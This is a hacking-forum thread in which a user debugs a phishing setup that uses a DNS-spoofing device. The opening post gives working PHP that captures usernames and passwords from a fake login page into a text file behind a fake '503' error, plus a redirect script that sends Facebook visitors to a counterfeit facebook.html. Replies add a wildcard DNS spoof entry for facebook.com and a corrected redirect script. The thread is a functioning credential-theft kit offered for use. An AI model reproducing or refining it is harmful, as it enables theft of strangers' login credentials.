Jump to content

First Time Poster, Phishing Question


Recommended Posts

kudos on an excellent toy btw! been toying with the apple for awhile off n on. just got back on it again.

trouble i am having is with the dns spoof. so far, i have got the 3g stick to work, connection is great. everything comes up as expected. however, if i turn the dns spoof on, every site just takes me to the error.php page. yesterday it worked fine with a facebook phish site, then today, after no changes, it is going buggy on me. ill paste what i have and maybe the wiser can see what i dont:)

error.php

<?php

$ref = $_SERVER['HTTP_REFERER'];

$today = date("F j, Y, g:i a");

if (isset($_POST['name']) && !empty($_POST['name'])) {

$nam = stripslashes($_POST['name']);

$pas = stripslashes($_POST['pass']);

$nam = htmlspecialchars($nam, ENT_QUOTES);

$pas = htmlspecialchars($pas, ENT_QUOTES);

$content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;

$filed = @fopen("bitches.txt", "a+");

@fwrite($filed, "$content\n");

@fclose($filed);

}

?>

<html><body>

<h1>503 Service Unavailable</h1>

</body></html>

index.php

<html>

<head>

<meta http-equiv="REFRESH" content="0;url=redirect.php">

</head>

<body>

</body>

</html>

redirect.php

<?php

$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, "facebook")) { header('Location: facebook.html'); }

require('error.php');

?>

Link to comment
Share on other sites

so just tried it again for giggles. it works. sometimes. most of the time it will send my www.whatever.com to www.whatever.com/redirect

"whatever" being, well...whatever i put in there. google does come to google sometimes, but then again, it also takes me to google.com/redirect which then leads to the error.php page or just a flickering refresh....plz helllp lol

Link to comment
Share on other sites

google.com has twelve IP numbers (74.125.228.34, 74.125.228.35, 74.125.228.39, 74.125.228.33, 74.125.228.36, 2607:f8b0:4004:801::1003, 74.125.228.38, 74.125.228.41, 74.125.228.32, 74.125.228.40, 74.125.228.37, 74.125.228.46). All twelve of them are on the same IP network.

http://www.robtex.co...om.html#records

redirecting all ips to your file should take care of any issues with it occasionally loading the legitimate page.

edit: and seeing as your dns spoofing that was useless advice

Edited by sober
Link to comment
Share on other sites

easier way is to put this in


172.16.42.1 *facebook.com
[/CODE]

If your still getting redirected to PHP.... replace your redirect.php with this to see if it works.

[CODE]
<?php
$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
if (strpos($ref, "facebook")) { header('Location: facebook.html'); }

require('error.php');

?>
[/CODE]

Report back please :D

Edited by Neworld
Link to comment
Share on other sites

thx for the help, just off work and gave it a try with *facebook.com, it appears to be working on my phone browser, ill try more indepth with the laptop tomorrow. just for knowledge sake, why do you think that the spoof worked at times but then not others? as i understand it, the wildcard sends the request off to redirect.php where it is then either looking to see if "facebook" is part of the request, and if so it will send the request off to the fake facebook.html, else it does nothing and functions as normal.

ill try the second fix tomorrow as well to see what it does. off to dream of pineapples now :D

Link to comment
Share on other sites

thx for the help, just off work and gave it a try with *facebook.com, it appears to be working on my phone browser, ill try more indepth with the laptop tomorrow. just for knowledge sake, why do you think that the spoof worked at times but then not others? as i understand it, the wildcard sends the request off to redirect.php where it is then either looking to see if "facebook" is part of the request, and if so it will send the request off to the fake facebook.html, else it does nothing and functions as normal.

ill try the second fix tomorrow as well to see what it does. off to dream of pineapples now :D

Glad I can help :D

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...